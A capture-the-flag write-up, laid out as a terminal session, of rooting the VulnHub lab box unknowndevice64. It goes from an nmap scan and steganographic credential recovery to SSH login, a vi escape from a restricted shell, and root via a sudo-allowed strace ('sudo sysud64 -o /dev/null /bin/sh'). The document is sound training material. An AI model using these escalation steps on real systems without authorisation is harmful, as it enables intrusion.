BACK
root@kalilinux:~/Documents/VulnHub/unknowndevice64#
bash-4.4$
bash-4.4$
_ _ _ ____ ___
| | | | (_) / ___| / |
_ _ _ __ | | ___ __ _____ ___ __ __| | _____ ___ ___ ___/ /___ / /| |
| | | | '_ \| |/ / '_ \ / _ \ \ /\ / / '_ \ / _` |/ _ \ \ / / |/ __/ _ \ ___ \/ /_| |
| |_| | | | | <| | | | (_) \ V V /| | | | (_| | __/\ V /| | (_| __/ \_/ |\___ |
\__,_|_| |_|_|\_\_| |_|\___/ \_/\_/ |_| |_|\__,_|\___| \_/ |_|\___\___\_____/ |_/
Target IP: 10.0.2.8
by sc00by
##########
NMAP scan:
##########
root@kalilinux:~/Documents/VulnHub/unknowndevice64# nmap -p- -sT -sV 10.0.2.8
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-22 10:59 CDT
Nmap scan report for 10.0.2.8
Host is up (0.00095s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.7 (protocol 2.0)
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
MAC Address: 08:00:27:E3:39:6C (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.40 seconds
[~!~] This is just normal services running
on different than normal ports.
########################
Python SimpleHTTPServer:
########################
[~!~] There is a Python SimpleHTTPServer
running on port 31337.
NOTE: "h1dd3n" in red, it could
be something important
If we view-source of the homepage,
we find this:
NOTE: "h1dd3n" in red, it could
be something important
If we view-source of the homepage,
we find this:
[~!~] Perhaps a file on the webserver?
root@kalilinux:~/Documents/VulnHub/unknowndevice64# wget 10.0.2.8:31337/key_is_h1dd3n.jpg
--2019-04-22 11:13:28-- http://10.0.2.8:31337/key_is_h1dd3n.jpg
Connecting to 10.0.2.8:31337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5386 (5.3K) [image/jpeg]
Saving to: ‘key_is_h1dd3n.jpg’
key_is_h1dd3n.jpg 100%[=========================>] 5.26K --.-KB/s in 0s
2019-04-22 11:13:28 (198 MB/s) - ‘key_is_h1dd3n.jpg’ saved [5386/5386]
root@kalilinux:~/Documents/VulnHub/unknowndevice64# file key_is_h1dd3n.jpg
key_is_h1dd3n.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 1
[~!~] Steg tools can help us extract anything
hidden within the file
root@kalilinux:~/Documents/VulnHub/unknowndevice64# steghide --extract -sf key_is_h1dd3n.jpg
Enter passphrase:
...
[~!~] Hmmm a password, let's try the string we found
on the website: h1dd3n
...
wrote extracted data to "h1dd3n.txt".
root@kalilinux:~/Documents/VulnHub/unknowndevice64# ls
h1dd3n.txt index.html key_is_h1dd3n.jpg
root@kalilinux:~/Documents/VulnHub/unknowndevice64# cat h1dd3n.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.
[~!~] This is the Brainfuck coding language, we
saw it last within the Kuya1 writeup.
Decoded:
ud64:1M!#64@ud
##################
We Got Some Creds:
##################
USER: ud64
PASS: 1M!#64@ud
[~!~] The other service we saw running was
SSH via port 1337.
root@kalilinux:~/Documents/VulnHub/unknowndevice64# ssh ud64@10.0.2.8 -p 1337
The authenticity of host '[10.0.2.8]:1337 ([10.0.2.8]:1337)' can't be established.
ECDSA key fingerprint is SHA256:i17eNafYZbuhnBTVOd3NGK7az/9ZPgwR8GQzqGenV9g.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.0.2.8]:1337' (ECDSA) to the list of known hosts.
ud64@10.0.2.8's password:
Last login: Mon Dec 31 08:37:58 2018 from 192.168.56.101
ud64@unknowndevice64_v1:~$
[~!~] And we got a shell on the box!
###################
A Shell on the Box:
###################
[~!~] I quickly learned that this was an
EXTREMELY restricted shell, which I
have not had much experience with.
Here is some of me struggling:
ud64@unknowndevice64_v1:~$ sudo -l
-rbash: sudo: command not found
ud64@unknowndevice64_v1:~$ find / -perm -u=s 2 =
-rbash: find: command not found
ud64@unknowndevice64_v1:~$ find / -perm -u=s -type f 2>/dev/null
-rbash: /dev/null: restricted: cannot redirect output
ud64@unknowndevice64_v1:~$ find / -perm -u=s -type f 2>/dev/null
-rbash: /dev/nul: restricted: cannot redirect output
ud64@unknowndevice64_v1:~$ din
ud64@unknowndevice64_v1:~$ find / -perm =
-rbash: find: command not found
ud64@unknowndevice64_v1:~$ find / -perm -u=s =
-rbash: find: command not found
ud64@unknowndevice64_v1:~$ find / -perm -u=s -type f
-rbash: find: command not found
ud64@unknowndevice64_v1:~$ whoami
ud64
ud64@unknowndevice64_v1:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
ud64@unknowndevice64_v1:~$ which python
-rbash: which: command not found
ud64@unknowndevice64_v1:~$ cd
-rbash: cd: restricted
[~!~] The WORST PART is that pressing 'backspace'
just mapped to 'space'
I learned that you can tab twice to show the
commands available to you in a restricted shell:
ud64@unknowndevice64_v1:~$
! alias case continue do esac fc hash jobs mapfile read shift time ulimit wait
./ bg cd coproc done eval fg help kill mc readarray shopt times umask while
: bind command date echo exec fi history let popd readonly source trap unalias whoami
[ break compgen declare elif exit for id local printf return suspend true unset {
[[ builtin complete dirs else export function if logout pushd select test type until }
]] caller compopt disown enable false getopts in ls pwd set then typeset vi
[~!~] [un]Luckily for us we can use vi, and
there is a way to break out
bash-4.4$ whoami
ud64
[~!~] Now we have an unrestricted shell!
From here we can edit our PATH and
SHELL to be able to access the other
commands we need:
bash-4.4$ export PATH=/usr/bin:$PATH
bash-4.4$ export SHELL=/bin/bash:$SHELL
########
PrivEsc:
########
bash-4.4$ sudo -l
User ud64 may run the following commands on unknowndevice64_v1:
(ALL) NOPASSWD: /usr/bin/sysud64
[~!~] A command we can run at sudo level
with no password
bash-4.4$ sysud64 -h | head
usage: strace
[-CdffhiqrtttTvVwxxy] [-I n] [-e expr]...
[-a column] [-o file] [-s strsize] [-P path]...
-p pid... / [-D] [-E var=val]... [-u username] PROG [ARGS]
or: strace -c[dfw] [-I n] [-e expr]... [-O overhead] [-S sortby]
-p pid... / [-D] [-E var=val]... [-u username] PROG [ARGS]
Output format:
-a column alignment COLUMN for printing syscall results (default 40)
-i print instruction pointer at time of syscall
-k obtain stack trace between each syscall (experimental)
[~!~] So sysud64 is actually strace, and there are
known setuid privesc with strace:
bash-4.4$
sh-4.4#
sudo sysud64 -o /dev/null /bin/sh
sh-4.4# whoami
root
[~!~] AND JUST LIKE THAT WE ARE ROOT!
#########
THE FLAG:
#########
sh-4.4# cd /root
sh-4.4# ls
Desktop Documents Downloads Music Pictures Public Videos flag.txt
sh-4.4# cat flag.txt
___ _ _
/ _ \ | | | |
/ /_\ \ | |__ __ _ ___| | _____ _ __
| _ | | '_ \ / _` |/ __| |/ / _ \ '__|
| | | | | | | | (_| | (__| < __/ |
\_| |_/ |_| |_|\__,_|\___|_|\_\___|_|
_ __ _
| | / _| | |
__| | ___ ___ ___ | |_ ___ _ __ | | _____ _____
/ _` |/ _ \ / _ \/ __| | _/ _ \| '__| | |/ _ \ \ / / _ \
| (_| | (_) | __/\__ \ | || (_) | | | | (_) \ V / __/
\__,_|\___/ \___||___/ |_| \___/|_| |_|\___/ \_/ \___|
_ _ _ _
| | | | | | | |
__ _| |__ __ _| |_ ___ | |_| |__ ___ _ __ ___
\ \ /\ / / '_ \ / _` | __| / _ \| __| '_ \ / _ \ '__/ __|
\ V V /| | | | (_| | |_ | (_) | |_| | | | __/ | \__ \
\_/\_/ |_| |_|\__,_|\__| \___/ \__|_| |_|\___|_| |___/
_ _ _ _
| | | | | | | |
__ _____ _ _| | __| | _ __ ___ | |_ __| | ___
\ \ /\ / / _ \| | | | |/ _` | | '_ \ / _ \| __| / _` |/ _ \
\ V V / (_) | |_| | | (_| | | | | | (_) | |_ | (_| | (_) |
\_/\_/ \___/ \__,_|_|\__,_| |_| |_|\___/ \__| \__,_|\___/
__
/ _|
| |_ ___ _ __ _ __ ___ ___ _ __ ___ _ _
| _/ _ \| '__| | '_ ` _ \ / _ \| '_ \ / _ \ | | |
| || (_) | | | | | | | | (_) | | | | __/ |_| |_
|_| \___/|_| |_| |_| |_|\___/|_| |_|\___|\__, (_)
__/ |
|___/
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( . | / | u | n | k | n | o | w | n | d | e | v | i | c | e | 6 | 4 )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
[~!~] That was a very fun box! Would highly recommend
trying it out yourself!
~sc00by
BACK